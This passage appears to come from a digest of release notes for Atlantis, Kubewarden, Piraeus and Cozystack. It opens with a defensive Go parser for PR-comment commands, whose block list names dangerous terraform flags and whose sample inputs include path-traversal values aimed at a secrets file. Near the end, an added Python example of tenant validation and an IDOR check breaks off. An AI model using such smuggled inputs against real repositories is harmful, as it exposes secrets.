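		arg = arg[:i]
	}
	return arg
}

func (p Parser) blocked(arg string) bool {
	if !strings.HasPrefix(arg, "-") {
		return false // a bare value such as "env=prod" is never a flag
	}
	c := canonical(arg)
	for _, b := range p.BlockedArgs {
		if canonical(b) == c {
			return true
		}
	}
	return false
}

func indexOf(ss []string, s string) int {
	for i, v := range ss {
		if v == s {
			return i
		}
	}
	return -1
}

// Parse accepts one command per comment. Control characters (including an
// embedded newline that could smuggle a second command) are rejected up front,
// unknown flags before "--" are rejected, -d may not escape the checkout, and
// every forwarded argument is checked against the blocklist.
func (p Parser) Parse(comment string) (*Parsed, error) {
	comment = strings.TrimSpace(comment)
	for _, r := range comment {
		if unicode.IsControl(r) {
			return nil, errors.New("control character in comment")
		}
	}
	fields := strings.Fields(comment)
	if len(fields) < 2 || fields[0] != p.Executable {
		return nil, fmt.Errorf("not a %s command", p.Executable)
	}
	out := &Parsed{Command: fields[1]}
	if !allowedCommands[out.Command] {
		return nil, fmt.Errorf("unknown command %q", out.Command)
	}
	rest := fields[2:]
	if i := indexOf(rest, "--"); i >= 0 {
		out.ExtraArgs, rest = rest[i+1:], rest[:i]
	}
	for i := 0; i < len(rest); i++ {
		if rest[i] != "-d" {
			return nil, fmt.Errorf("unexpected argument %q before --", rest[i])
		}
		if i+1 >= len(rest) {
			return nil, errors.New("-d needs a value")
		}
		d := filepath.Clean(rest[i+1])
		if filepath.IsAbs(d) || d == ".." || strings.HasPrefix(d, "../") {
			return nil, fmt.Errorf("directory %q escapes the repository", rest[i+1])
		}
		out.Dir = d
		i++
	}
	for _, a := range out.ExtraArgs {
		if p.blocked(a) {
			return nil, fmt.Errorf("%w: %q", ErrBlockedArg, a)
		}
	}
	return out, nil
}

func main() {
	p := Parser{Executable: "atlantis", BlockedArgs: []string{"-var-file", "-chdir", "-target"}}
	for _, c := range []string{ // constructed PR comments
		"atlantis plan -d modules/app -- -var env=prod",
		"atlantis plan -- -var-file=../secrets.tfvars",
		"atlantis plan -d modules/../../other-repo",
	} {
		got, err := p.Parse(c)
		fmt.Printf("%-48q -> %+v err=%v\n", c, got, err)
	}
}
```

A blocklist only covers the flags you thought of; keep it for the dangerous terraform options (anything that changes which files or state are read) and prefer repo-level policy for the rest.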

Documentation

  • docs: add AI_USAGE_POLICY.md by @Copilot in #6347
  • docs: fix --emoji-reaction supported VCS list (remove Azure DevOps, add Gitea) by @akihiro17 in #6407
  • docs: update Azure DevOps allowlist format for visualstudio.com URLs by @nimro in #6083
  • docs: Add CloudScript to adopters list by @xcloudscript in #6411

Dependencies

  • chore(deps): update node.js to v24.15.0 in .node-version (main) by @renovate[bot] in #6423
  • chore(deps): Bump dompurify from 3.2.6 to 3.4.1 by @dependabot[bot] in #6420
  • chore(deps-dev): Bump postcss from 8.5.8 to 8.5.12 by @dependabot[bot] in #6432
  • chore(deps): update ghcr.io/runatlantis/atlantis:latest docker digest to a8873d7 in dockerfile.dev (main) by @renovate[bot] in #6418
  • chore(deps): update debian:12.13-slim docker digest to f9c6a2f in dockerfile (main) by @renovate[bot] in #6421
  • chore(deps): update ngrok/ngrok:latest docker digest to 013f046 in docker-compose.yml (main) by @renovate[bot] in #6424
  • chore(deps): update alpine docker tag to v3.23.4 in dockerfile (main) by @renovate[bot] in #6429
  • chore(deps): update ngrok/ngrok:latest docker digest to f737dcc in docker-compose.yml (main) by @renovate[bot] in #6434
  • chore(deps): update ngrok/ngrok:latest docker digest to 6ead432 in docker-compose.yml (main) by @renovate[bot] in #6436
  • chore(deps): update dependency hashicorp/terraform to v1.14.9 in testdrive/utils.go (main) by @renovate[bot] in #6446

Other Changes

New Contributors

Full Changelog: v0.42.0...v0.43.0

Kubewarden sandbox

Kubewarden is a Policy Engine powered by WebAssembly policies. Its policies can be written in CEL, Rego (OPA & Gatekeeper flavours), Rust, Go, YAML, and others....

v1.36.0-alpha

  • chore: add release contributors section (#1690)
  • fix(ci): updatecli checking for files that does not exist (#1713)
  • chore: update container images to use adm-controller namespace (#1712)
  • refactor: update repository references to adm-controller (#1701)
  • feat(controller): allow custom labels on PolicyServer resources (#1699)

🐛 Bug Fixes

  • fix(deps): update go dependencies (#1688)
  • fix(deps): update rust dependencies (#1707)

🧰 Maintenance

  • build: v1.36.0-alpha release (#1721)
  • chore(deps): update kubewarden/github-actions action to v7 (#1719)
  • chore: Remove audit-scanner folder, not needed (#1715)
  • fix(deps): update go dependencies (#1688)
  • chore(deps): Update Helm chart dependencies (#1711)
  • build(deps): lock file maintenance (#1710)
  • chore(deps): update otel/opentelemetry-collector docker tag to v0.151.0 (#1709)
  • chore(deps): update github actions (#1708)
  • fix(deps): update rust dependencies (#1707)
  • chore(deps): update github actions (#1696)

Contributors

@AkashKumar7902, @chimera-kube-bot, @flavio, @jvanz, @kubewarden-auth-token-generator[bot], @renovate[bot], @viccuad, kubewarden-auth-token-generator[bot] and renovate[bot]

Piraeus Datastore sandbox

v2.10.6

This release brings support for the newly released Ubuntu 26.04 loader, along with a number of fixes and improvements. To list a few of them:

  • Fix incorrect capability spec for the nfs-server
  • Update DRBD and LINSTOR to fix a potential data loss issue when syncing on thin volumes.
  • Update LINSTOR CSI to improve validations for RWX volumes
  • Update LINSTOR Affinity Controller to allow skipping reconciliation of specific volumes.

Added

  • Image configuration for Ubuntu 26.04 (Resolute Raccoon)

Fixed

  • Fixed NFS Server DaemonSet capabilities.

Changed

  • Updated images:
    • LINSTOR 1.33.2
    • LINSTOR CSI 1.11.0
    • DRBD 9.3.2
    • LINSTOR Affinity Controller 1.4.0

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

v1.3.0

Cozystack v1.3.0

Cozystack v1.3.0 brings storage-aware pod scheduling via a LINSTOR scheduler extender, a managed LINSTOR GUI web console with Keycloak SSO, a curated VM Default Images catalog for out-of-the-box virtual-machine provisioning, a new WorkloadsReady / Events observability surface with S3 bucket metering, and cross-namespace VMInstance backup restore with a full RestoreJob dashboard flow. The release also ships stricter tenant-name validation, VMInstance network-selector improvements, Keycloak theme injection and SMTP configuration, a host-runtime preflight check, and rolls up every fix from the v1.2.1 → v1.2.4 patch line.

Note: Items marked (backported to v1.2.x) were also shipped in v1.2.1, v1.2.2, v1.2.3, or v1.2.4 patch releases.

Feature Highlights

Storage-Aware Scheduling via the LINSTOR Extender

The cozystack-scheduler now calls a LINSTOR scheduler extender for storage-locality-aware pod placement. When a pod declares both a SchedulingClass and LINSTOR-backed PVCs, the scheduler consults LINSTOR to prefer nodes where volume replicas already exist — reducing cross-node replication traffic and improving I/O latency for storage-heavy workloads such as databases, object stores, and VMs.

The integration builds on the existing SchedulingClass tenant workload placement system introduced in v1.2.0 and requires no tenant-side configuration — workloads simply benefit once a SchedulingClass is assigned. Administrators can mix storage locality with the existing data-center / hardware-generation constraints defined on SchedulingClass CRs (@lllamnyp in #2330).

LINSTOR GUI: Managed Web Console for Storage Administration

A new opt-in linstor-gui system package deploys LINBIT's linstor-gui web UI alongside the LINSTOR controller with mTLS client authentication, non-root security context, and a ClusterIP-only service by default. When OIDC is configured on the platform, an optional Keycloak-protected Ingress (via oauth2-proxy) exposes the UI for browser access. Access is restricted to members of the cozystack-cluster-admin Keycloak group, consistent with host-cluster admin RBAC, and the gatekeeper blocks in-app LINSTOR authentication setup at the nginx proxy layer so the managed configuration cannot be subverted through the UI.

Operators who prefer CLI access keep the existing linstor command; the GUI is strictly additive and stays disabled by default (@myasnikovdaniil in #2382, #2390, #2415, #2419).

VM Default Images: Out-of-the-Box VM Provisioning

The new vm-default-images package provides a curated set of cluster-wide virtual-machine images (Ubuntu, Debian, CentOS Stream, and others) as pre-populated DataVolumes, so tenants can provision VMs against well-known base images without first having to upload them. The package is opt-in via the iaas bundle and defaults to replicated storage for high availability. Migration 38 renames legacy vm-image-* DataVolumes to the new vm-default-images-* naming scheme, and the vm-disk chart gains a new "disk" source type for cloning from existing vm-disks in the same namespace (@myasnikovdaniil in #2258).

Application Observability: WorkloadsReady, Events, and S3 Bucket Metering

Applications now expose a WorkloadsReady condition on their status by querying associated WorkloadMonitor resources, giving operators a single place to check whether all underlying workloads (Deployments, StatefulSets, DaemonSets, PVCs) are healthy. The dashboard gains a new Events tab showing namespace-scoped Kubernetes events per application, with fallback to .firstTimestamp when .eventTime is absent. A long-standing bug where WorkloadMonitor's Operational status was never persisted is fixed in the same change (@lexfrei in #2356).

The WorkloadMonitor reconciler is extended to track COSI BucketClaim objects as first-class Workloads, and the bucket controller now queries SeaweedFS logical and physical bucket-size metrics from VictoriaMetrics via a namespace-scoped monitoring endpoint, enabling S3 billing integration on par with Pods and PVCs (@kitsunoff in #2391). Workloads are also enriched with workloads.cozystack.io/resource-preset and source-object labels so downstream billing pipelines can correlate monitors with the tenant preset that produced them (@androndo in #2416).

Cross-Namespace VM Backup Restore and RestoreJob Dashboard

The backup system now supports restoring VMInstance backups into a different namespace (cross-namespace copy restores) with IP/MAC preservation and safe rename semantics. In-place backup and restore flows for VMDisk and VMInstance are improved: HelmReleases and DataVolumes are properly handled, and Velero failure messages are propagated to the Application status. The backup status structure has been refactored to store underlying resources as a generic opaque JSON object, enabling arbitrary application-specific metadata without status-schema churn (@androndo in #2251, #2319, #2329).

The dashboard now ships a complete RestoreJob experience: list view, details page, create form, and sidebar entry, with a "Same as backup" fallback rendering when spec.targetApplicationRef is omitted. Non-CRD-backed sidebar factories (kube-*, plan, backupjob, backup, restorejob) are marked static so they pick up consistent managed-by labels across reconciles (@myasnikovdaniil in #2437).

Major Features and Improvements

  • [api] Reject tenant names with dashes at Create time: Enforces alphanumeric-only naming for Tenants at the API level, preventing names with hyphens that would silently fail during Helm reconciliation. A corresponding regex tightening and regression test suite hardens the validation (@lexfrei in #2380).

  • [platform] Validate computed tenant namespace length: Rejects Tenant creation when the computed ancestor-chain namespace would exceed the 63-character Kubernetes namespace limit, preventing opaque HelmRelease reconcile errors downstream (@lexfrei in #2376).

  • [vm-instance] Rename subnets to networks and add dropdown selector: Renames the misleading subnets field to networks in VMInstance for clarity, adds a dropdown selector for available networks in the dashboard form, and includes migration 36 to copy existing subnets values. The old field remains supported for backward compatibility (@sircthulhu in #2263).

  • [keycloak] Enable injecting themes: Cozystack administrators can now inject custom Keycloak themes via initContainers for UI white-labeling and customization (@lllamnyp in #2142).

  • [keycloak-configure] Add email verification and SMTP configuration: Adds configurable Keycloak settings for user self-registration, email verification, and SMTP server configuration, enabling automated user onboarding flows (@BROngineer in #2318).

  • [postgres] Pin system PostgreSQL to 17.7-standard-trixie: Pins the PostgreSQL image for system databases (Grafana, Alerta, Harbor, Keycloak, SeaweedFS) to 17.7-standard-trixie across chart templates and values.yaml, and ships migration 37 to patch existing CNPG Cluster imageName fields to the same variant (handling unset, any PG 17 tag, and bare-version tags). This prevents CNPG from defaulting to PostgreSQL 18 and locks system databases to the trixie variant consistent with the monitoring stack requirements (related backports shipped in v1.2.1 via #2309 and v1.2.2 via #2364) (@myasnikovdaniil in #2369).

  • [platform] Prevent installed packages deletion: Adds the helm.sh/resource-policy: keep annotation to platform packages so disabling a package no longer triggers automatic Helm deletion, restoring the documented behavior where operators must explicitly delete a package (backported to v1.2.1) (@kvaps in #2273).

  • [mariadb] Always enable replication for consistent service naming: MariaDB now always enables replication, creating -primary/-secondary services even for single-replica instances. This fixes dashboard visibility and backup functionality for single-replica setups (@sircthulhu in #2279).

  • [hack] Add host runtime preflight check: New check-host-runtime.sh script and make preflight target that warns operators when a standalone containerd or docker runtime is running alongside the embedded k3s runtime, helping diagnose container-runtime conflicts early in an installation (@lexfrei in #2371).

  • [hack] Add check-readiness.sh diagnostic script: A new diagnostic script for tracking platform reconciliation by checking readiness of Packages, ArtifactGenerators, ExternalArtifacts, and HelmReleases, with support for watch mode and continuous monitoring (@myasnikovdaniil in #2294).

  • [platform] Add resourcePreset labels to WorkloadMonitor labels: WorkloadMonitor labels with the workloads.cozystack.io/ prefix are now propagated onto created Workloads; created Workloads always include the reserved workloads.cozystack.io/monitor label, and Helm app charts add workloads.cozystack.io/resource-preset metadata to WorkloadMonitor manifests, enabling downstream billing pipelines to correlate monitors with the tenant preset that produced them (@androndo in #2416).
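The two validations listed above ("Reject tenant names with dashes at Create time" and "Validate computed tenant namespace length") can be illustrated together. The following is an added example in Python and is not Cozystack's own code. It assumes a `tenant` prefix and a namespace built by joining the ancestor chain with dashes; under that layout a dash inside a tenant name would make the parent/child split ambiguous, which is why the name check is stricter than a plain DNS label. Everything except the 63-character Kubernetes namespace limit is an assumption of this example.

```python
import re
from typing import List, Optional

MAX_NAMESPACE_LEN = 63       # Kubernetes limit for a namespace name (DNS label)
NAMESPACE_PREFIX = "tenant"  # assumed prefix for tenant namespaces
# Assumed: lowercase alphanumerics only, stricter than a DNS label precisely so
# that '-' can serve as the unambiguous separator in compute_namespace().
TENANT_NAME_RE = re.compile(r"[a-z0-9]+")


def validate_tenant_name(name: str) -> str:
    """Reject empty names and names containing the separator character."""
    if not TENANT_NAME_RE.fullmatch(name):
        raise ValueError(
            f"tenant name {name!r} must be non-empty lowercase alphanumeric, no dashes")
    return name


def compute_namespace(chain: List[str]) -> str:
    """Derive the namespace for the last tenant of an ancestor chain [root, ..., leaf]
    and reject it up front when it exceeds the Kubernetes limit, instead of letting
    a HelmRelease fail later with an opaque reconcile error."""
    if not chain:
        raise ValueError("ancestor chain must not be empty")
    ns = "-".join([NAMESPACE_PREFIX, *map(validate_tenant_name, chain)])
    if len(ns) > MAX_NAMESPACE_LEN:
        raise ValueError(
            f"computed namespace {ns!r} is {len(ns)} characters, limit is {MAX_NAMESPACE_LEN}")
    return ns


def parent_namespace(ns: str) -> Optional[str]:
    """Invert compute_namespace by one level: the parent of 'tenant-a-b' is 'tenant-a';
    a root tenant ('tenant-a') has no parent. The split is only well-defined because
    tenant names themselves never contain dashes."""
    parts = ns.split("-")
    if parts[0] != NAMESPACE_PREFIX or len(parts) < 2:
        raise ValueError(f"{ns!r} is not a tenant namespace")
    for part in parts[1:]:
        validate_tenant_name(part)
    return None if len(parts) == 2 else "-".join(parts[:-1])


def admit(chain: List[str]) -> dict:
    """What an admission-time check would answer: the namespace, or the reason for denial."""
    try:
        return {"allowed": True, "namespace": compute_namespace(chain)}
    except ValueError as exc:
        return {"allowed": False, "reason": str(exc)}
```

Running both checks at admission time turns a silent or opaque reconcile failure into an immediate, specific API error, which is the point of the two items.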

Bug Fixes

  • [platform] Migrate ACME HTTP-01 to ingressClassName API: Switches ACME HTTP-01 issuance from the deprecated acme.cert-manager.io/http01-ingress-class annotation to the modern ingressClassName field on ClusterIssuer and solver pods. Previously, ClusterIssuers referenced a non-existent nginx class while each Ingress individually overrode it via annotation — producing ingressClassName and class cannot be set at the same time errors when tenants attempted to migrate to the modern field. The migration is atomic: both the ClusterIssuer and consuming Ingresses are updated together (backported to v1.2.4) (@myasnikovdaniil in #2436).

  • [harbor] Remove incorrect tenant module flags: Harbor is a PaaS service, not a tenant module. Incorrect spec.dashboard.module: true and internal.cozystack.io/tenantmodule flags caused Harbor to appear in the sidebar "Modules" section and be misclassified by controllers handling tenant modules. The flags are now removed so Harbor is displayed in its proper PaaS category and is no longer treated as a tenant-scoped HelmRelease (@kvaps in #2444).

  • [kube-ovn] Resolve kubeovn-plunger RBAC forbidden on deployments: Grants kube-ovn-plunger the RBAC needed to list Deployments so it can reconcile ovn-central, fixing deployments.apps is forbidden errors in cozy-kubeovn (@kvaps in #2441).

  • [cilium] Opt-out of cri-containerd.apparmor.d for nsenter init containers: Opts cilium-agent init containers out of the cri-containerd.apparmor.d AppArmor profile on non-Talos variants (cilium-generic, kubeovn-cilium-generic), fixing Init:CrashLoopBackOff on Ubuntu 22.04+ and Debian where the profile denies nsenter namespace entry. Talos variants are untouched as Talos does not load the AppArmor LSM (backported to v1.2.2) (@lexfrei in #2370).

  • [virtual-machine] Exclude external VM services from Cilium BPF LB: Adds the service.kubernetes.io/service-proxy-name: cozy-proxy label to VM LoadBalancer services with external: true, telling Cilium to skip BPF processing entirely. Fixes inter-tenant connectivity via public LB IPs (Cilium's DNAT caused cross-tenant pod-to-pod flow classification, triggering CiliumClusterwideNetworkPolicy blocks) and restores WholeIP behavior on Cilium 1.19+ where wildcard service drop entries previously blocked traffic to LB IPs on undeclared ports (backported to v1.2.2) (@mattia-eleuteri in #2357).

  • [monitoring] Fix infra dashboards missing in default variant: Includes the cozy-monitoring namespace in the dashboard rendering condition, fixing infrastructure Grafana dashboards not rendering in the default platform variant (only the tenant-root namespace was previously checked) (backported to v1.2.2) (@mattia-eleuteri in #2365).

  • [build] Filter git describe to match only v* tags: Adds --match 'v*' to all git describe calls in hack/common-envs.mk, preventing the api/apps/v1alpha1/vX.Y.Z subtag from being picked up instead of the release tag and producing invalid Docker image tags (backported to v1.2.2) (@kvaps in #2386).

  • [platform] Fix resource allocation ratios not propagated to packages: Restores propagation of cpuAllocationRatio, memoryAllocationRatio, and ephemeralStorageAllocationRatio from platform/values.yaml to the cozystack-values Secret that managed applications and KubeVirt read, fixing a regression introduced in the bundle restructure that silently ignored operator-configured ratios (backported to v1.2.1) (@sircthulhu in #2296).

  • [kubernetes] Set explicit ephemeral-storage on virt-launcher pods: Sets explicit domain.resources ephemeral-storage on the VirtualMachine spec to prevent virt-launcher pods from being evicted because LimitRange defaults were too small for the actual emptyDisk capacity (backported to v1.2.3) (@kvaps in #2317).

  • [multus] Pin master CNI to 05-cilium.conflist: Prevents a boot-time race where multus could auto-detect kube-ovn's conflist instead of Cilium's, which would cause pods to bypass the Cilium chain entirely and lose their endpoint (backported to v1.2.1) (@kvaps in #2315).

  • [multus] Build custom image with DEL cache fix: Fixes sandbox cleanup deadlock when CNI ADD never completes, preventing stale sandbox name reservations from permanently blocking pod creation after a node disruption (backported to v1.2.1) (@kvaps in #2313).

  • [linstor] Set verify-alg to crc32c: Prevents DRBD connection failures on kernels where crct10dif is unavailable (e.g., Talos v1.12.6 with kernel 6.18.18) by setting the LINSTOR verify-alg controller default to crc32c (backported to v1.2.1) (@kvaps in #2303).

  • [linstor] Preserve TCP ports during toggle-disk operations: Saves existing TCP ports into the LayerPayload before removeLayerData() deletes them, preventing DRBD resources from entering StandAlone state when a satellite misses the resulting update (backported to v1.2.1) (@kvaps in #2292).

  • [linstor] Increase satellite startup probe failure threshold: Raises the LINSTOR satellite startupProbe failureThreshold from 3 to 30 (30s → 300s) in the LinstorSatelliteConfiguration pod template, giving satellites with slow storage initialization enough time to come up without being killed and restarted (@Arsolitt in #2425).

Security

  • docs: add SECURITY.md: Adds vulnerability reporting procedures, disclosure expectations, and supported release lines (@kvaps in #2230).

  • docs: add OpenSSF Best Practices badge to README: Adds the OpenSSF Best Practices passing badge to the project README (@lexfrei in #2320).

Dependencies & Version Updates

  • [kube-ovn] Bump kube-ovn to v1.15.10 with port-group regression fix: Updates packages/system/kubeovn to upstream v1.15.10 (from v1.15.3) and carries a patch for pkg/controller/pod.go that preserves a VM LSP's port-group memberships when Kubernetes GCs a completed virt-launcher pod while another virt-launcher pod of the same VM is still running. Without the patch, the destination pod of a successful live migration lost its security groups, network policies, and node-scoped routing until kube-ovn-controller was restarted (@kvaps in #2443).

  • [monitoring] Upgrade victoria-metrics-operator to v0.68.4: Bumps the vendored victoria-metrics-operator Helm chart from 0.59.1 to 0.61.0 (operator appVersion v0.68.1 → v0.68.4), picking up upstream fixes for VMPodScrape port routing on VMAgent/VLAgent and StatefulSet pod deletion (not eviction) when maxUnavailable=100% (@lexfrei in #2426).

  • [linstor] Update piraeus-server to v1.33.2 with selected backports: Bumps LINSTOR server from v1.33.1 to v1.33.2 with backported patches for stale bitmap adjust retry, LUKS2 header sizing, optimal I/O size detection, and the maintainer implementation. All patches verified against upstream v1.33.2 with git apply --check and gradlew compileJava (backported to v1.2.2) (@kvaps in #2331).

  • [kamaji] Update to 26.3.5-edge, drop upstreamed patches: Updates Kamaji from edge-26.2.4 to 26.3.5-edge and removes two patches accepted upstream. Adds configurable probe tuning and DataStore readiness conditions (@myasnikovdaniil in #2260).

  • [talm] Release v0.23.0, v0.23.1, v0.24.0 (github.com/cozystack/talm): Migrates to the Talos v1.12 multi-document machine config format (@lexfrei in cozystack/talm#116); renders templates online in apply to resolve lookups (@myasnikovdaniil in cozystack/talm#119); bumps dependencies and modernizes the codebase (@lexfrei in cozystack/talm#124).

  • [ansible-cozystack] Release v1.2.1, v1.2.2, v1.2.4 (github.com/cozystack/ansible-cozystack): Exposes publishing.externalIPs and tenant-root ingress via role variables (@lexfrei in cozystack/ansible-cozystack#30); adds a comprehensive node prerequisites audit (@lexfrei in cozystack/ansible-cozystack#27); replaces ansible.utils.ipaddr with a stdlib-based test plugin (@lexfrei in cozystack/ansible-cozystack#24); adds v prefix to collection version in requirements.yml examples (@lexfrei in cozystack/ansible-cozystack#23); tracks installer releases v1.2.1 through v1.2.4 (@app/renovate in cozystack/ansible-cozystack#20, #22, #29, #31, #32).

Development, Testing, and CI/CD

  • [ci] Replace cozystack-bot PAT with cozystack-ci GitHub App: Replaces the long-lived cozystack-bot personal access token with short-lived, scoped tokens from the cozystack-ci GitHub App across all release workflows (tags.yaml, auto-release.yaml, pull-requests-release.yaml), improving security and auditability of CI operations (@tym83 in #2351; @kvaps in #2383, #2392).

  • [ci] Add Gemini Code Assist and CodeRabbit configuration: Adds repository-level configuration for AI code reviewers with ignore patterns for vendored/generated code and incremental review settings (@lexfrei in #2385).

  • [ci] Promote next/ trunk on new minor/major releases: Updates update-website-docs in tags.yaml to match the new docs-versioning contract — the website repo replaces the old "pre-create vX.Y/ draft directory" scheme with a permanent content/en/docs/next/ trunk, and released version directories are promoted explicitly by the release workflow (@myasnikovdaniil in #2433).

  • [tests] Fix Kafka E2E test timeout and retry race condition: Increases Kafka E2E test timeout from 60s to 300s and fixes a retry race where kubectl apply could hit a still-deleting resource (@lexfrei in #2358).

  • docs: adopt Conventional Commits for commit and PR titles: Standardizes commit and PR title format to type(scope): description across all contributing docs and the PR template (@lexfrei in #2395).

  • docs(ci): require screenshots for UI changes in PR template: Adds a mandatory screenshots section to the PR template for UI-related changes (@kitsunoff in #2407).

  • chore(maintenance): add @myasnikovdaniil to CODEOWNERS: Adds @myasnikovdaniil to the default owners in .github/CODEOWNERS for automatic review requests (@myasnikovdaniil in #2434).

Documentation

  • [website] Add ApplicationDefinition naming convention reference: Documents how cozystack-api resolves kinds to their backing definitions (@lexfrei in cozystack/website#478).

  • [website] Document Talos / talosctl / Cozystack version pairing: Adds a version compatibility matrix for installation (@lexfrei in cozystack/website#484).

  • [website] Document namespace layout and parent/child derivation: Explains tenant namespace hierarchy and parent/child namespace derivation rules (@lexfrei in cozystack/website#479).

  • [website] Document the checkbox-then-edit-CR customization pattern for tenants: Describes the workflow for customizing tenant settings via the CR after initial checkbox-based creation (@lexfrei in cozystack/website#485).

  • [website] Add custom Keycloak themes documentation: Covers the theme image contract, configuration, imagePullSecrets, and theme activation in the Keycloak admin console (@lexfrei in cozystack/website#463).

  • [website] Add bonding (LACP) configuration how-to guide: Covers network bonding configuration for Cozystack installations (@sircthulhu in cozystack/website#459).

  • [website] Improve registry mirrors for tenant Kubernetes in air-gapped guide: Improves documentation for configuring registry mirrors in air-gapped environments (@sircthulhu in cozystack/website#461).

  • [website] Rewrite guide for ApplicationDefinition API (external-apps): Comprehensive rewrite of the external apps guide using the ApplicationDefinition API with Minecraft server examples (@kitsunoff in cozystack/website#488).

  • [website] Add documentation for Go types usage: Guide for using generated Go types for Cozystack managed applications as a Go module (@myasnikovdaniil in cozystack/website#465).

  • [website] Update backup/restore documentation for VMI/VMDisk: Updates backup documentation with VM instance and VM disk restore improvements (@androndo in cozystack/website#466).

  • [website] Refactor docs versions to major.minor variants: Moves docs to major.minor versioning for the v1.x series (@myasnikovdaniil in cozystack/website#477).

  • [website] Trunk-based versioning with permanent next/ directory: Replaces the old "pre-create vX.Y/ draft directory" scheme with a permanent content/en/docs/next/ trunk; released version directories are promoted explicitly by hack/release_next.sh on new minor/major releases, and routing between next/ and vX.Y/ is Makefile-driven (@myasnikovdaniil in cozystack/website#495).

  • [website] Add updated OpenAPI spec: Updates the OpenAPI specification for managed applications reference (@myasnikovdaniil in cozystack/website#469).

  • [website] Add OpenAPI spec download to GitHub Pages build: Fixes the GitHub Pages build to include the OpenAPI spec download (@myasnikovdaniil in cozystack/website#494).

  • [website] Add OSS Health pages and OpenSSF badge: Adds OSS Health section with OpenSSF Scorecard and Best Practices badges to the website (@tym83 in cozystack/website#470).

  • [website] Add Telemetry page under OSS Health section: Adds the Telemetry page with initial data seeding to the OSS Health docs (@tym83 in cozystack/website#471, cozystack/website#504).

  • [website] Blog: OSS Health section launch announcement: Publishes the announcement blog post for the OSS Health section (@tym83 in cozystack/website#474).

  • [website] Fix OpenSSF canonical status URL: Changes the OpenSSF canonical status URL from pt-BR to en (@tym83 in cozystack/website#475).

  • [website] Add CozySummit Virtual 2026 program announcement: Publishes the CozySummit Virtual 2026 program announcement blog post (@tym83 in cozystack/website#472).

  • [website] Add missing release announcements for v0.1–v0.41: Backfills missing release announcement blog posts for historical Cozystack versions (@tym83 in cozystack/website#468).

  • [website] Blog: managed PostgreSQL with synchronous replication: Adds a post covering the managed PostgreSQL synchronous-replication feature (@tym83 in cozystack/website#497).

  • [website] Blog taxonomies and client-side filter UI: Registers article-type and topic taxonomies and adds a client-side filter on the blog list page (@tym83 in cozystack/website#499).

  • [website] Add images frontmatter for social preview on existing posts: Adds images frontmatter for social preview on existing blog posts (@tym83 in cozystack/website#498).

  • [website] Fix broken links and stale anchors across v1 docs: Fixes 14 broken links and stale talm anchors (@lexfrei in cozystack/website#486).

  • [website] Prefix bundle package names with cozystack. in v1 examples: Corrects package naming in documentation examples (@lexfrei in cozystack/website#482).

  • [website] Finish isolated-field removal and document opt-in policy labels: Removes the obsolete isolated field from tenant documentation and documents the new opt-in policy labels approach (@lexfrei in cozystack/website#481).

  • [website] Add --take-ownership flag and describe networking.* fields: Documents the --take-ownership flag and networking.* fields in the installation guide (@lexfrei in cozystack/website#480).

  • [website] Fix KubeOVN MASTER_NODES example path and key in troubleshooting: Corrects the MASTER_NODES example path and key (@lexfrei in cozystack/website#483).

  • [website] Add CLAUDE.md for AI agent guidance: Adds a CLAUDE.md file describing the trunk-based docs architecture for AI agent guidance (@myasnikovdaniil in cozystack/website#489).

  • [website] Update /docs/v1/ redirect to latest v1.2: Updates the /docs/v1/ redirect target to point to the latest v1.2 docs on GitHub Pages (@myasnikovdaniil in cozystack/website#492).

  • [website] Remove nbykov from CODEOWNERS and CLAUDE.md: Cleans up CODEOWNERS and CLAUDE.md entries (@myasnikovdaniil in cozystack/website#491).

  • [website] Add Ahrefs Analytics tracker: Adds the Ahrefs Analytics tracker to the website (@tym83 in cozystack/website#503).

  • [website] Add breathing room between navbar and hero on OSS Health: Minor styling fix for the OSS Health section (@tym83 in cozystack/website#500).

  • [website] Fix og social badge image and title: Updates the social badge image and title (@tym83 in cozystack/website#487).

  • [website] Update managed apps reference for v1.2.1: Automated managed-apps reference update (@cozystack-bot in cozystack/website#464).

  • [external-apps-example] Replace MongoDB example with Minecraft apps: Refactors the external apps example to use the ApplicationDefinition API with Minecraft server applications (@lexfrei in cozystack/external-apps-example#2).

  • docs: update README introductory description: Refines the platform positioning and improves clarity on core capabilities in the main README (@tym83 in #2409).

Governance

Contributors

We'd like to thank all contributors who made this release possible:

New Contributors

We're excited to welcome our first-time contributors:


Full Changelog: v1.2.0...v1.3.0


Cozystack sandbox


v1.2.3

v1.2.3 (2026-04-20)

A patch release with bug fixes and documentation updates.

Features and Improvements

No notable features in this patch release.

Fixes

  • fix(kubernetes): set explicit ephemeral-storage on virt-launcher pods: Prevents VM crashes caused by ephemeral-storage eviction by setting explicit domain.resources ephemeral-storage on the VirtualMachine spec. Uses sanitized limits and requests so virt-launcher pods do not inherit too-small namespace defaults. (@kvaps in #2317, backport #2423).

Documentation

Other repositories

Contributors

Thanks to everyone who contributed to this patch release:

Full Changelog: v1.2.2...v1.2.3


Cozystack sandbox


v1.3.1

v1.3.1 (2026-04-28)

Patch release covering a TenantNamespace IDOR fix in the API, a destructive post-upgrade hook removed from the etcd chart, kamaji controller stability, a linstor-csi bump that fixes live migration on Protocol-A/B DRBD resources, the missing linstor-gui build wiring, and a velero RBAC fix that unblocked installs on bundles without Velero.

Security

  • fix(api): prevent IDOR in TenantNamespace Get and Watch handlers: Two IDOR (Insecure Direct Object Reference) vulnerabilities allowed authenticated users to read TenantNamespace metadata they had no RoleBinding for. The Get and Watch handlers now go through a new hasAccessToNamespace() helper that lists RoleBindings scoped only to the target namespace (orders of magnitude faster than the previous all-cluster scan), returns NotFound instead of leaking existence on unauthorized access, and applies the same check on the Watch filter path. Includes regression tests for the unauthorized paths. (@IvanHunters in #2471, backport #2524)
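As an added illustration of the check described above (not Cozystack's own code), the following Python models a TenantNamespace Get and Watch path that lists RoleBindings only in the target namespace and answers the same NotFound for an unauthorized namespace as for a missing one. A leaky variant that returns Forbidden for existing-but-unauthorized namespaces is kept for contrast: that distinction is an existence oracle. The in-memory store, subject matching and sample data are simplified assumptions; real RBAC also involves ClusterRoleBindings and aggregated roles, which this omits.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple


class NotFound(Exception):
    """Raised for missing AND unauthorized namespaces: no existence oracle."""


class Forbidden(Exception):
    """Used only by the leaky variant below to show the information leak."""


@dataclass(frozen=True)
class Subject:
    kind: str            # "User", "Group" or "ServiceAccount"
    name: str
    namespace: str = ""  # only meaningful for ServiceAccount subjects


@dataclass(frozen=True)
class RoleBinding:
    namespace: str
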